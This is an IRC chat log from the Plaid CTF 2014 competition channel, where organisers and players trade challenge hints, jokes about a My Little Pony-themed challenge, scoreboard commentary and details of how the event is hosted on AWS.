(11:07:35) qUit: (l0l0l) (dd94627a@gateway/web/freenode/ip.221.148.98.122) Quit: Page closed
(11:07:38) (+tylerni7) ryan-c: how large a team do you think we have?
(11:07:39) (+tylerni7) :P
(11:07:44) (+frozencemetery) ryan-c: as in, we lock ourselves in the basement and don't come out until chals are solved
(11:07:48) (+mserrano) lolwut.
(11:07:52) (+ricky) Xteven: Try to break into the company portal thing!
(11:07:54) (DonnchaC) how long is left in the CTF?
(11:07:55) (ryan-c) haha
(11:08:02) (ryan-c) DonnchaC: about 5 hours
(11:08:02) (+frozencemetery) ryan-c: everyone who's been a part of making chals has been voiced in this channel
(11:08:05) (+mserrano) I mean, we have like weeks to test problems whereas you guys have to do all of them in 48h
(11:08:05) qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Ping timeout: 240 seconds
(11:08:07) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(11:08:08) (+ricky) ryan-c: Yeah, we test each other's problems - sometimes that leads to stuff being undervalued a little
(11:08:16) (Xteven) ricky: right :P
(11:08:20) (+tylerni7) heh
(11:08:37) (ryan-c) don't you guys have a bunch of less dedicated people?
(11:08:38) (+tylerni7) ricky promises harry potter took him "a few minutes"
(11:08:50) (+mserrano) ryan-c: yeah, but they don't really work on/test these challenges
(11:08:52) (+tylerni7) ryan-c: yeah, but they also didn't help with pCTF... too busy with other things :(
(11:08:58) (+frozencemetery) let us examine the word "dedicated"
(11:09:02) (+ricky) I changed it to "an hour or so"
(11:09:05) (ronbarrey) any advice for web150?
(11:09:18) (+mserrano) ronbarrey: there's a hint on the webpage!
(11:09:24) (+tylerni7) mserrano: you are the worst
(11:09:31) (ryan-c) yeah, but some of you SOBs do shit like this: http://security.ece.cmu.edu/aeg/aeg-current.pdf
(11:09:57) (+tylerni7) ryan-c: I don't think any of us that did pctf are on that paper
(11:09:59) (+mserrano) yeah
(11:10:05) (+frozencemetery) nope, that's none of us
(11:10:27) (ryan-c) also, is tomcr00se seriously just geohot playing by himself?
(11:10:29) (+mserrano) http://linkyzer0.com/papers/GPS%20Software%20Attacks.pdf on the other hand has tylerni7 written ALL OVER IT
(11:10:29) (+tylerni7) they helped with the first pctf... but yeah
(11:10:30) (geobot) could bring them to learn that rtorrent just happy i helped with him after i already
(11:10:34) (+frozencemetery) ryan-c: yup
(11:10:50) (+mserrano) ryan-c: yeah
(11:11:00) +ricky roots for whatever team is working hardest on bronies
(11:11:01) (+frozencemetery) geobot: I found the worst rtorrent bug the other day
(11:11:14) (tokki) oh god those hints, tho
(11:11:21) (+tylerni7) btw, what do people think of the bronies website?
(11:11:22) (+tylerni7) :D
(11:11:25) (+mserrano) tokki: lol
(11:11:38) (tokki) lol
(11:11:46) (+tylerni7) lol
(11:11:58) (ryan-c) tylerni7: fuck your captcha
(11:12:05) (+ricky) Best captcha ever
(11:12:13) (+tylerni7) ryan-c: are you not true brony?
(11:12:21) (ryan-c) tylerni7: i am not
(11:12:36) (tokki) lol the bronies website is c...cute...?
(11:12:43) (ryan-c) f5 until one of the two that my girlfriend told me the name of
(11:12:52) (tokki) :O
(11:13:15) (+tylerni7) (I am not a brony, fwiw, I think I can identify apple jack and pinkie pie in the captcha)
(11:13:18) (asmoday) I really hope someone has kids
(11:13:26) (+ricky) tylerni7: You misspelled Pinkie Pie as Pinky Pie :-P
(11:13:29) (+tylerni7) oh
(11:13:31) (+tylerni7) >_>
(11:13:35) (+tylerni7) I AM NOT TRUE BRONY
(11:13:36) (+ricky) ^ Might be useful to anybody trying to solve that captcha
(11:13:43) (+ricky) I just left it as is to not confused people
(11:13:58) jOin: (Adran) (adran@botters/staff/adran)
(11:14:00) (+tylerni7) >.<
(11:14:01) (+tylerni7) sorry
(11:14:10) (+tylerni7) we need bronies in our QA process, clearly
(11:15:07) (haoz) web 150
(11:15:08) (haoz) ?
(11:15:20) (+mserrano) web 150
(11:15:20) (+mserrano) .
(11:15:24) (ronbarrey) mserrano: on hints page?
(11:15:34) (+mserrano) http://play.plaidctf.com/problems/hints
(11:15:36) (+frozencemetery) yep, web 155 is certainly a problem alright
(11:15:40) (+frozencemetery) *150
(11:15:52) (+mserrano) next year all our point values should be cmu course numbers
(11:15:53) (+mserrano) 251
(11:15:53) (+mserrano) 151
(11:15:55) (ronbarrey) that's the easy part
(11:16:08) (+mserrano) 410
(11:16:09) (ronbarrey) what about the missing asp page?
(11:16:12) (+frozencemetery) mserrano: yesss
(11:16:14) (+frozencemetery) D: 410
(11:16:18) (+mserrano) missing asp page?
(11:16:57) (sigsegv_) demo_form_action.asp to be precise
(11:17:08) (Kasalehlia) mserrano: active server pages page?
(11:17:11) (ryan-c) I've gotten about 1000 points myself and expcet to get another 250, yet he has more than my entire team.
(11:17:13) (ronbarrey) demo_form_action.asp not found after query
(11:17:31) (ryan-c) though to be fair we have the reversing skills of a llama
(11:17:41) (Adran) what
(11:17:42) (Adran) where'd everyone go?
(11:17:42) (f00b4r_) does freya server down?
(11:17:49) (+ricky) haha
(11:18:01) (+ricky) If dragon sector solves bronies 1, they'll be 1 point behind 0xffa
(11:18:05) (+frozencemetery) f00b4r_: no, it might be slower than you like though
(11:18:14) (+ricky) This might be the first time in pctf history that breakthrough might matter
(11:18:21) nIck: (lmoro) is now known as (johnCool)
(11:19:04) (+mserrano) ronbarrey: lol that has nothing to do with it
(11:19:06) (+frozencemetery) f00b4r_: I just ran my solution and it's working
(11:19:09) (+mserrano) it's weird that that's a thing
(11:19:16) (f00b4r_) frozencemetery: k, thanks
(11:19:20) (+frozencemetery) np
(11:19:21) (+frozencemetery) (alternate answers included: yes, but less often than yer mum)
(11:19:28) (ryan-c) tomcr00se: hey, wanna be on my team? :-D
(11:19:39) (+frozencemetery) geobot: wanna be on ryan-c's team?
(11:19:47) (+frozencemetery) (probably too busy hacking)
(11:19:50) (ryan-c) we have candy
(11:19:58) (+mserrano) GEOMON GOTTA CATCH EM ALL OH SO TRUEEEEEEE
(11:19:59) (n00bz) ryan-c, you are from hf?
(11:20:08) (ryan-c) n00bz: no
(11:20:51) (ryan-c) what's hf?
(11:21:03) (+frozencemetery) high food?
(11:21:16) (ryan-c) frozencemetery: taco bell?
(11:21:23) (+frozencemetery) vlc?
(11:21:34) (mrsmith67) are you guys going to extend the end of the ctf?
(11:21:35) (asmoday) which company was hiring or recruiting as a sponsor?
(11:21:39) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(11:21:53) (+mserrano) asmoday: all of them would like to hire people, I suspect
(11:21:57) (+tylerni7) mrsmith67: no
(11:21:57) (ryan-c) endgame, salesforce and accuvant
(11:22:01) (+cai_) mrsmith67: no, it'll end in time
(11:22:03) (+cai_) on*
(11:22:09) (mrsmith67) ok
(11:22:11) (ryan-c) i am not quite sure why salesforce
(11:22:13) (dcbz_) accuvant being the best of those 3
(11:22:15) (dcbz_) ;-)
(11:22:24) (mrsmith67) can i ask someone a quick q about bronies1?
(11:22:27) (ryan-c) OMG CLOUDS LOL
(11:22:27) (asmoday) wonder which you might work for haha
(11:22:34) (dcbz_) vicious allegations!
(11:22:36) (dcbz_) :D
(11:23:01) (+cai_) ryan-c: they have a red team :p
(11:23:23) (asmoday) RED TEAM FLORIDA!!!!!
(11:23:28) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Client Quit
(11:23:47) jOin: (noregret) (~regret@unaffiliated/noregret)
(11:23:55) (+tylerni7) ryan-c: I think forbes has ranked them as the most innovative company in the USA last year
(11:24:18) (asmoday) ok you have convinced me I will join
(11:24:34) (ryan-c) I'm just kind of suprised they have a dedicated redteam and are looking to expand it
(11:24:59) (+tylerni7) seems reasonable to me *shrug*
(11:25:37) (ronbarrey) mserrano: so what's the deal with the admin panel?
(11:25:43) (ryan-c) tylerni7: This view is mostly shaped by some silly XSSs in their platform
(11:26:11) (ryan-c) i really don't know shit
(11:27:05) (+mserrano) ronbarrey: pretend I set the form action to be admin.php
(11:27:22) (+tylerni7) lol
(11:29:10) (ronbarrey) mserrano: sorry not authorized...
(11:29:17) (+mserrano) well
(11:29:21) (+mserrano) figure out how to get authorized ;)
(11:29:34) (Xteven) mserrano: there is no admin.php
(11:29:36) (factoreal) who solved g++?
(11:29:42) (+frozencemetery) ur not admin.php
(11:29:48) (Xteven) oh ok
(11:29:55) (|x_x|) Can I be admin.php?
(11:30:54) (+tylerni7) factoreal: if you have questions on it you can ask me
(11:31:56) qUit: (rickroll_) (4ac33e6f@gateway/web/freenode/ip.74.195.62.111) Quit: Page closed
(11:33:34) jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
(11:33:49) (corpille) i hate that admin.php
(11:35:05) (+cai_) grats Stratum Auhuur for taking the third :)
(11:35:08) (sigsegv_) can we assume $SECRET is too long to bruteforce?
(11:35:17) (+mserrano) yes
(11:35:18) (stypr) no english
(11:35:38) (stypr) you no english? I no no english
(11:35:51) (+tylerni7) you all are making the last few hours really exciting on the scoreboard :O
(11:35:59) (tokki) :D
(11:36:00) (ronbarrey) mserrano: why is there a hint of ?page=...
(11:36:02) (+ricky) Useless hint: Oh bronies, prevent_teams_from_stealing_your_xss_payload is *not* part of the challenge, it's an implementation detail
(11:36:11) (tokki) lol
(11:36:12) (+ricky) I thought it was obvious from the field name; -/
(11:36:35) (+tylerni7) -_-
(11:36:50) jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
(11:36:59) (Xteven) ricky: is there a hint on how the portal page is visited for bronies1?
(11:37:00) (geobot) can pm someone a quick q about bronies1?
(11:37:14) jduck shakes his fist at intricacies!
(11:37:20) (+ricky) geobot: :-P
(11:37:25) (piroko) tylerni7: Alright, I have been messing with the tor source code for about 10 hours now. I'm memcpy'ing "beef" into the rend_cookie before it's sent to the rendezvous point at src/or/rendclient.c:80
(11:37:28) (stypr) lol
(11:37:31) (piroko) shit
(11:37:33) (tokki) lol I wonder how many times we have gone around the boardgame
(11:37:36) (+tylerni7) piroko: -_-
(11:37:38) (+frozencemetery) 8/10 would geobot again
(11:37:41) (+tylerni7) piroko: you should pm houqp anyway
(11:37:42) (+tylerni7) not me
(11:37:48) (+ricky) Xteven: No hint other than "Recon has also revealed that The Plague likes to browse this site during work hours"
(11:37:49) (geobot) that's why i browse everything with ie8
(11:37:56) (stypr) i don't know after stealing cooks.
(11:37:57) (+frozencemetery) tokki: this is I believe the third
(11:38:02) (stypr) on that little pony
(11:38:03) (Xteven) ricky: ok
(11:38:05) (tokki) ooh
(11:38:37) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(11:39:35) qUit: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
(11:39:43) qUit: (ronbarrey) (
[email protected]) Quit: Yaaic - Yet another Android IRC client - http://www.yaaic.org
(11:40:58) (Ymgve) seems you overestimated people's love for blackberry
(11:41:00) (houqp_) piroko: 10 hours!? have you found any bug in it?
(11:41:09) (Ymgve) not even one 100pts
(11:41:27) (n00bz) none on pwn100?
(11:41:33) (iZsh) yeah i dont get the blackberry thing at all
(11:41:43) (iZsh) only 100pt for first stage but i dont understand wtf :)
(11:42:48) jOin: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(11:43:06) (+mserrano) iZsh: Stage 1 is 250pts
(11:43:27) (iZsh) oh yeah, that's the opposite
(11:43:38) (+mserrano) yeah it's sorted by points it looks lik
(11:43:38) (+mserrano) ev0v
(11:43:40) (+mserrano) like*
(11:44:50) (chrissing) anyone i can pm aboutkappa?
(11:45:00) (+tylerni7) chrissing: dickoff
(11:45:06) qUit: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158) Ping timeout: 240 seconds
(11:45:09) (chrissing) wow thats mean...
(11:45:12) (+tylerni7) -_-
(11:45:14) (chrissing) sorry for asking
(11:45:18) (+tylerni7) chrissing: message dickoff
(11:45:20) qUit: (poppopret) (
[email protected]) Remote host closed the connection
(11:45:22) (chrissing) ohhhhh
(11:45:23) (+dickoff) chrissing: lol it's me
(11:45:26) ([pwn]TM) rofl
(11:45:27) (asmoday) haha
(11:45:29) (+tylerni7) -_______-
(11:45:33) (asmoday) them nicknames though
(11:45:36) qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
(11:45:50) (+tylerni7) it's his name -_-
(11:45:53) (+dickoff) them lastnames though
(11:45:57) (+mserrano) lol
(11:46:07) (houqp_) best irc name
(11:46:42) (stypr) I don't feel like participating now
(11:47:00) (stypr) my brain is flowing at the ponyland
(11:47:01) (+mserrano) D:
(11:47:11) (stypr) pony pony pony.. dat captcha
(11:47:54) (DonnchaC) Could I PM someone about rendevous?
(11:48:09) (houqp_) DonnchaC: me
(11:48:33) (+frozencemetery) (houqp is legit)
(11:49:04) (tomcr00se) stypr: i'm so happy i watched that show now
(11:49:08) mOde: (ChanServ) sets (+v houqp_)
(11:49:22) jOin: (bot_) (8d644bcc@gateway/web/freenode/ip.141.100.75.204)
(11:49:22) (stypr) tomcr00se: lol wat
(11:49:28) (tomcr00se) my little pony
(11:49:31) (tomcr00se) i know all the ponies
(11:49:38) (Hertz) roflmao
(11:49:40) (stypr) one of my friends used to watch that
(11:49:45) nIck: (bot_) is now known as (Guest68736)
(11:50:06) (Guest68736) who can I pm for halphow2js
(11:50:12) (stypr) she always talked about pony and I never thought of it coming as a challenge
(11:50:18) (tomcr00se) also this ctf is really competitive
(11:50:45) jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
(11:50:48) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(11:50:51) (tokki) fak my chrome must hate me
(11:51:27) (Guest68736) can I someone pm for the halphow2j challenge?
(11:51:32) (+dickoff) tomcr00se: we're really happy with how much competition there's been for the top spots, always makes it more fun to watch :)
(11:52:10) (wtbw) and hey, it's a CTF that won't be won by PPP for once!
(11:52:12) (poppopret) can I pm someone for doge_stege
(11:52:14) jOin: (lukasz_) (~chatzilla@2607:5300:100::f7)
(11:52:49) (tomcr00se) like i have to beat leetmore to top10
(11:53:27) (vos) morning guys
(11:53:29) (+dickoff) wtbw: hmm, now that you mention it, we do have control of the scoreboard ;)
(11:53:37) (vos) whom can i ask about bronies pt2?
(11:53:42) (+houqp_) poppopret: poke mserrano
(11:53:43) (+dickoff) vos: ricky
(11:53:45) (vos) thx
(11:54:00) (Guest68736) whom can i ask about halphow2js
(11:54:32) (+mserrano) Guest68736: pm me I guess
(11:54:34) qUit: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128) Remote host closed the connection
(11:55:40) (+mserrano) tomcr00se: :)
(11:55:56) qUit: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Quit: Page closed
(11:56:22) jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(11:58:40) (foundation) WHOA, I KNOW HOW TOR WORKS
(11:59:02) (foundation) that's how i feel when i learn something really really fast during some ctf
(11:59:26) (|x_x|) How does tor work?
(11:59:52) (Ymgve) magic
(11:59:54) (Ymgve) and magnets
(12:00:02) (|x_x|) That makes a lot of sense.
(12:00:09) (halfvollemelk) I heard it has something to do with onions
(12:00:17) (wtbw) dickoff: hah :)
(12:00:19) (PauseSave) more magnet than magic, the magic is mostly like endless hankercheifs and stuff
(12:00:23) (+frozencemetery) garlic: the other onion router
(12:00:35) (halfvollemelk) bronions
(12:00:45) (+frozencemetery) yesss
(12:01:34) (halfvollemelk) tips for doge_stege? xD
(12:01:40) (tokki) much doge!
(12:02:12) qUit: (bool101) (~bool@unaffiliated/bool101) Ping timeout: 250 seconds
(12:04:07) (_joeje_) PPP: any arm binaries this comp?
(12:04:36) qUit: ([SF]testdata) (75d9b8dc@gateway/web/freenode/ip.117.217.184.220) Ping timeout: 240 seconds
(12:06:02) (+dickoff) _joeje_: nope
(12:06:08) (+frozencemetery) lolarm
(12:06:32) (foundation) sadness
(12:06:56) _joeje_ throws rasppi on the floor
(12:07:26) (foundation) noooo, save it for defcon quals
(12:07:32) (+frozencemetery) _joeje_: http://stream1.gifsoup.com/view1/1516381/happy-birthday-to-the-ground-o.gif ?
(12:08:01) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(12:08:20) (foundation) unless legitbs found a cheap stash of wii's and make this year the year of ppc
(12:08:22) qUit: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126) Quit: Page closed
(12:11:06) qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Ping timeout: 240 seconds
(12:11:29) pArt: (lukasz_) (~chatzilla@2607:5300:100::f7)
(12:13:25) (Valodim) bronies broken?
(12:14:23) nIck: (namrog) is now known as (namrog84)
(12:15:35) (+ricky) poppopret: Looking now, was grabbing lunch
(12:15:55) (Valodim) (bronies fixed)
(12:16:00) (+ricky) Cool
(12:16:11) (+ricky) poppopret: Sorry, that wasn't to you at all, hehe
(12:16:36) (poppopret) lol yea i was confused
(12:16:45) (morla) gnahh
(12:17:03) (morla) i think i killed halphow2js
(12:17:05) (morla) sorry :(
(12:17:06) qUit: (Fireghost) (
[email protected]) Read error: Connection reset by peer
(12:17:13) (morla) if i did...
(12:17:17) jOin: (someone__) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34)
(12:17:24) jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
(12:18:44) (dwn) hey
(12:18:47) (dwn) UPDATE2: Also, bronies is not intended to be solved via client side (e.g. webkit) exploits - if you manage to do so though, that's fair game.
(12:18:53) (dwn) by "exploits"
(12:19:12) (dwn) I mean
(12:19:31) (+ricky) dwn: By exploits I mean memory corruption/webkit bugs
(12:19:38) (+awesie) dwn: that means like pwn2own/pwnium 0days :)
(12:19:49) (dwn) ok because yeah I figured there wasn't another way than what I was thinking
(12:21:36) qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Ping timeout: 240 seconds
(12:22:57) (dwn) also anyone manage to get some challenge that happens to require libseccomp running on kali
(12:23:34) jOin: (j0f`) (~j0f@unaffiliated/j0f)
(12:24:53) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(12:25:05) (sdfsfdsfd) sdasd
(12:25:05) (morla) ricky, awesie: could you check halphow2js, i might have busted it :(
(12:25:18) jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
(12:25:29) (morla) wont happen again ://
(12:25:34) (morla) i hope lol
(12:26:23) (areke) what time does this end?
(12:26:39) (someone__) any hints for formatting the flag on multiplication is hard
(12:26:57) qUit: (j0f`) (~j0f@unaffiliated/j0f) Client Quit
(12:27:11) (ryan-c) someone__: it's a series of digits
(12:28:03) (+awesie) areke: ends at 5pm EDT
(12:28:24) (|x_x|) So roughly 3.5 hours?
(12:28:30) (areke) thanks
(12:28:38) (+awesie) |x_x|: correct
(12:28:46) (|x_x|) Dankeshe
(12:28:54) (lavish) someone__: once you get it you'll understand
(12:29:51) (+awesie) morla: i restarted halphow2js, should be working now?
(12:31:37) (tokki) is there any tenement hint?
(12:31:43) tokki blinks eyes
(12:31:53) tokki makes the "cute" face
(12:32:01) tokki stares at admins
(12:32:14) tokki *blink**blink*
(12:32:48) (dwn) the webs are easier than tenement and worth more yo
(12:32:49) (geobot) is there any tenement hint?
(12:33:11) (dwn) ppp has revealed their love for webchalls
(12:33:11) (geobot) yeah ucsd revealed that the worst
(12:33:20) (dwn) geobot now triggers on every line I say
(12:33:37) (Adran) lol
(12:33:57) (+cai_) grats MSLC for getting part 1 of bbos :)
(12:34:50) (+frozencemetery) geobot: no, no tenement hint for you
(12:34:59) jOin: (hammerpig) (~user@gateway/tor-sasl/hammerpig)
(12:35:03) (tokki) and me +_+?
(12:35:13) tokki has freaking shiny eyes
(12:35:28) (+frozencemetery) D::::
(12:35:36) qUit: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243) Ping timeout: 240 seconds
(12:35:50) (tokki) frozencemetery: D:::::
(12:36:01) (mrsmith67) ricky: check pm's
(12:37:00) (tokki) +_+
(12:37:08) (tokki) + _+
(12:37:12) (tokki) + _+
(12:37:21) (dwn) tokki: there's not really any way to give a hint for that challenge. like the best hint that could be given is "have you opened it in a disassembler? do you know what shellcode is?"
(12:37:23) (iZsh) scoreboard is down?
(12:37:26) (+cai_) MSLC finished bbos :) grats!
(12:37:33) (tokki) dwn: kk..
(12:37:36) (+cai_) iZsh: it's working
(12:37:44) (+cai_) try refreshing
(12:39:09) (morla) awesie: yes, thanks!
(12:39:27) (+mserrano) dayum leetmore
(12:39:30) jOin: (DKay) (uid11914@gateway/web/irccloud.com/x-pslnfvcgkqlkagfl)
(12:39:48) (+ricky) Key hoarding sucks :-(
(12:39:48) (geobot) it'd probably just does it :-(
(12:39:56) (+cai_) MSLC now on 3rd
(12:40:02) (DKay) awesome More Smoked Leet Chicken got 'bbos' :/
(12:40:19) (+cai_) no, the race won't work. stop trying
(12:40:27) (+mserrano) hellman: y u do dis
(12:40:38) (tomcr00se) wtf so many solves so fast
(12:40:40) (+cai_) we'll actually deduct points if we see it again
(12:41:03) (+mserrano) tomcr00se: I suspect they actually solved all these a while ago and were just hoarding solves
(12:41:13) jOin: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243)
(12:41:35) (dwn) nah they just woke up ;)
(12:42:00) (Ymgve) gotta scare the top teams a bit
(12:42:25) (+frozencemetery) you're not as fast as THESE DATABASE CONSTRAINTS *flexes*
(12:42:27) (robbje) or giving other teams high hopes and then demoralizing them ;D
(12:42:58) (|x_x|) That's what I'd do if I weren't an idjit.
(12:43:15) (Ymgve) I feel bad for the teams that haven't solved sanity check
(12:44:14) (|x_x|) I feel bad for the teams that haven't solved multiplication is hard.
(12:44:23) (+mserrano) whoa, whoa
(12:44:25) (+mserrano) multiplication is hard man
(12:44:37) (|x_x|) Exactly!
(12:44:45) (|x_x|) Which is why I feel bad for anyone still working on it.
(12:45:23) qUit: (ricky) (~ricky@fedora/ricky) Ping timeout: 240 seconds
(12:46:12) jOin: (ricky) (~ricky@fedora/ricky)
(12:46:13) mOde: (ChanServ) sets (+v ricky)
(12:48:24) jOin: (cimmi_) (1f2d47df@gateway/web/freenode/ip.31.45.71.223)
(12:49:00) (_blasty_) MSLC six flags in 20 mins ?
(12:49:00) (geobot) we were the first 30 mins ago, so everybody can just use fd redirecting stuff or will be great
(12:49:19) (+tylerni7) _blasty_: apparently
(12:49:46) (dwn) who is 0xffa comprised of
(12:49:48) (_blasty_) j00 myt3 w4nn4 4ud1t j00r 1nfr4
(12:49:55) (_blasty_) I think there's russians in your db
(12:50:04) (+mserrano) I'm pretty sure that's no tit
(12:50:05) (+mserrano) not*
(12:50:12) (_blasty_) flag hoarding /
(12:50:12) (geobot) you are just hoarding solves
(12:50:13) (dwn) im pretty sure mslc is just good
(12:50:15) (+frozencemetery) _blasty_: but we had evil bit checking enabled and everything!
(12:50:22) (+tylerni7) geobot: you know what's up
(12:50:22) (geobot) and u breast fed, what's wrong with boobs?
(12:50:28) (dwn) ownedf
(12:50:29) (+tylerni7) wtf
(12:50:30) (+mserrano) yeah they probably flag harded
(12:50:30) (geobot) i have seen flag isn't the 195 one
(12:50:32) (+mserrano) geobot: wtf
(12:50:33) (zoku) so
(12:50:34) (+mserrano) w.t.f.
(12:50:34) (zoku) close
(12:50:35) (zoku) to
(12:50:36) (geobot) they seem to win
(12:50:36) (zoku) ez
(12:50:37) (zoku) hp
(12:50:41) (Ymgve) actually it was a wormhole
(12:50:58) (Ymgve) submitted last year but just showed up today
(12:51:25) (nopple) lol, where has geobot been hanging out lately?
(12:51:26) (geobot) (finals, quals will still don't agree that hanging out and chatting is all new portlandia episode :-o
(12:51:49) (dwn) hey ppp how do you run this ctf. like a bunch of amazon aws instances? some colo'd esxi box?
(12:51:56) (+mserrano) ec2
(12:51:56) (+dickoff) dwn: it's all on aws
(12:52:00) qUit: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd) Remote host closed the connection
(12:52:00) qUit: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) Read error: Connection reset by peer
(12:52:00) qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Read error: Connection reset by peer
(12:52:24) (_joeje_) whats the ballpark server cost after all is said in done
(12:52:38) (dwn) do you use a script to set up an instance for a challenge? how do you deploy/redeploy a challenge?
(12:52:42) (+tylerni7) _joeje_: probably a few hundred
(12:52:59) (+tylerni7) dwn: we have scripts for making instances for problems, and manually set up the challenge on it
(12:53:07) (+tylerni7) we basically just scp from our git
(12:53:25) (dwn) ah cool
(12:53:31) jOin: (guy_) (~guy@unaffiliated/guy/x-2189580)
(12:53:57) (+ricky) we should automate stuff nicely... eventaully
(12:54:06) qUit: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243) Ping timeout: 240 seconds
(12:54:18) +ricky continues waiting for ds to solve bronies 1
(12:54:21) (x7r0n) 6 flags in just 20 min MSLC ..wat u guys on weed.. ?? oh graph..look at it..
(12:54:27) (x7r0n) MSLC is on fire
(12:54:28) (+ricky) Other teams have a headstart on bronies 2 - better catch up :-)
(12:54:29) (x7r0n) :-D
(12:54:55) (+frozencemetery) automated deployment is complicated by some problems requiring different configurations (os, for example)
(12:55:55) (shadghost) 54.* addresses are genarly AWS servers
(12:56:50) (shadghost) As of January 30, 2014, the current CloudFront IP addresses are:
(12:56:50) (shadghost) 54.192.0.0/16
(12:56:50) (shadghost) 54.230.0.0/16
(12:56:50) (shadghost) 54.239.128.0/18
(12:56:50) (shadghost) 54.239.192.0/19
(12:56:52) (shadghost) 54.240.128.0/18
(12:56:55) (shadghost) 204.246.164.0/22
(12:56:57) (shadghost) 204.246.168.0/22
(12:57:00) (shadghost) 204.246.174.0/23
(12:57:02) (shadghost) 204.246.176.0/20
(12:57:05) (shadghost) 205.251.192.0/19
(12:57:07) (shadghost) 205.251.249.0/24
(12:57:10) (shadghost) 205.251.250.0/23
(12:57:12) (shadghost) 205.251.252.0/23
(12:57:15) (shadghost) 205.251.254.0/24
(12:57:17) (shadghost) 216.137.32.0/19
(12:57:20) (shadghost) (AWS ip ranges)
(12:57:34) mOde: (ChanServ) sets (+o tylerni7)
(12:57:48) jOin: (Beched) (6dbc7f17@gateway/web/freenode/ip.109.188.127.23)
(12:57:54) mOde: (ChanServ) sets (-o tylerni7)
(12:58:18) (+tylerni7) shadghost: we have AWS instances not in those ranges, fwiw :P
(12:59:16) (+frozencemetery) we also have instances *not* in those ranges, tbf
(12:59:46) (shadghost) https://forums.aws.amazon.com/ann.jspa?annID=2051
(12:59:56) (shadghost) well I was pulling from that page
(13:00:09) (iZsh) anyone for bbos?
(13:00:14) qUit: (x7r0n) (
[email protected]) Read error: Connection reset by peer
(13:00:22) (+tylerni7) iZsh: poke awesie
(13:00:30) (+awesie) iZsh: pm me
(13:00:58) (shadghost) err I have a instance outside thoes ranges.
(13:01:06) (tokki) awesie is awesome
(13:02:12) (shadghost) Err here it is fro EC2
(13:02:13) (shadghost) https://forums.aws.amazon.com/ann.jspa?annID=1701
(13:02:15) qUit: (T1mb0) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Like it? Visit #hydrairc on EFNet
(13:03:30) (dunamis) hi, anybody available for an ezhp question?
(13:03:55) (+mserrano) dunamis: pm
(13:04:08) (cychao) sorry , is freya work? it's return nothing
(13:04:39) (Xteven) is there a better explanation of parlor?
(13:04:48) (+tylerni7) Xteven: you can pm me if you're confused about it
(13:04:57) (+tylerni7) I can clarify the description if it's unclear
(13:05:15) (+tylerni7) .win 133
(13:05:16) (+tylerni7) ugh
(13:05:29) mOde: (ChanServ) sets (+v frozencemetery1)
(13:05:32) (ronbarrey) mserrano: any sites that would offer advice for web150?
(13:05:45) (tokki) lol my teammate is using the crypto 20 for his linux root password
(13:05:46) (geobot) and 20 times!
(13:06:10) (+tylerni7) cychao: seems like it's still working though
(13:06:18) (Xteven) tylerni7: thx
(13:06:20) (+tylerni7) np
(13:06:22) (+dickoff) geobot: that's a lot!
(13:06:28) (+frozencemetery1) my poc works against freya so it's fine
(13:06:54) (_joeje_) random pwnables plx
(13:07:12) (tokki) wait frozencemetery1 i thought you just left
(13:07:37) (+frozencemetery1) tokki: the internet connection on my server is not the best
(13:07:51) mOde: (ChanServ) sets (+o cai_)
(13:07:53) (+ricky) _joeje_: Why don't you look at bronies instead? You might enjoy that problem :-P
(13:07:56) (tokki) oh you have a little 1 next to your nick xp
(13:07:59) (+frozencemetery1) you would think that fios wouldn't have these problems, but I guess not
(13:08:03) (+frozencemetery1) yeah
(13:08:07) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 3 Hours left | $30 added to each cash prizes so far (from CHANCE card))
(13:08:15) mOde: (ChanServ) sets (-o cai_)
(13:08:39) (_joeje_) ah, thought chance jumped to a random problem
(13:08:39) (cychao) frozencemetery1 tylerni7 : thank you
(13:08:47) (tokki) chance likez moniez
(13:08:50) (tokki) not hintz
(13:10:16) (+dickoff) _joeje_: nah, it'll either reveal a hint, add money to the prize pool (already maxed out at $30) or do nothing
(13:10:30) (phiber__) who can I talk about parlor crypto?
(13:10:32) (poppopret) for all the pwnables do you need to spawn a shell?
(13:10:47) (+tylerni7) phiber__: me
(13:10:53) (+ricky) Usually getting a shell is a good idea on all the pwnables
(13:11:18) (+ricky) But do whatever it takes to get the flag :-)
(13:11:19) (geobot) but the guy who takes for acez to me feel free to talk lol
(13:11:19) (+cai_) _joeje_: you get to roll one more time if you land on chance
(13:11:21) (+cai_) like now
(13:11:26) mOde: (ChanServ) sets (+v frozencemetery)
(13:11:52) nIck: (bool_101) is now known as (bool101)
